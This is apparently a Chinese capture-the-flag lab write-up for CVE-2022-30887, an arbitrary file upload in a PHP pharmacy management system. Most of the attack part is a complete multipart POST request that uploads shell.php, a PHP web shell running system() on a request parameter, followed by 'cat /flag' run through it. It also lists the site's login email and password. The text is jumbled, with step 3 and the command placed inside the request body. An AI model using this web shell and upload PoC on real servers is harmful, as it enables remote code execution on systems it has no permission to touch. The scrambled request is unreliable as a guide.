CVE-2022-30887
靶场环境：春秋云境 CVE-2022-30887
https://yunjing.ichunqiu.com/cve/detail/748?type=1&pay=2
靶标介绍：
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药
房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个
综合数据库，并根据到期、产品等各种参数提供各种报告。
该 CMS 中
php_action/editProductImage.php 存在任意文件上传漏洞，进而导致任意代码执行。
首先我们进入靶场首页，转了一圈，发现需要登录，忘记密码功能无法使用，密码登录显示
类型错误
2.根据靶场地址中的提示“该 CMS 中 php_action/editProductImage.php 存在任意文件上传
漏洞，进而导致任意代码执行。”
发现这里有一个漏洞，那么我们抓一个包看一下
我们可以直接将抓取到的内容替换为下面贴出的 poc，然后再发送过去，返回 success，发
现 shell 已经上传成功。
POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type:
multipart/form-data;
boundary=---------------------------
208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"
-----------------------------208935235035266125502673738631
3.访问 ip:port/assets/myimages/shell.php?s=xxx
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg
通过上传的 shell 即可进行命令执行
s=cat /flag
<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
网站的正确账号和密码
email：mayuri.infospace@gmail.com
passwd：mayurik